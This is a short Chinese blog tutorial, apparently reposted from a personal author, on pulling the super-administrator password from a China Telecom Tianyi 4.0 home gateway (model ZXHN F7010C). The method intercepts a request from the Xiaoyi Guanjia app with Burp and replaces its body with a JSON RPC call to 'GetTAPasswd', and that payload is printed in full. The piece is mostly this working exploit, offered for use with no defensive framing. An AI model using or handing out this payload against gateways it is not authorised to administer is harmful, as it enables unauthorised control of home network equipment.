之前讲过天翼3.0的超级管理员密码的破解,利用文件越权漏洞便可以破解,但是4.0的网关该漏洞已经修复。今天来看看如何破解吧!
环境网关型号 ZXHN F7010CBurp小翼管家APP实现原理登录小翼管家APP,先将指示灯关闭。设置代理后,打开指示灯按钮,然后利用burp抓包。修改包数据即可!
设置代理打开APP后,点击打开指示灯按钮并抓包。
修改包内容如下:
代码语言:javascript代码运行次数:0运行复制{
"Params": [],
"MethodName": "GetTAPasswd",
"RPCMethod": "CallMethod",
"ObjectPath": "/com/ctc/igd1/Telecom/System",
"InterfaceName": "com.ctc.igd1.SysCmd",
"ServiceName": "com.ctc.igd1"
}视频演示//player.bilibili.com/player.html?aid=984644141&bvid=BV18t4y1J7Hs&cid=809334954&page=1
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2119704
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。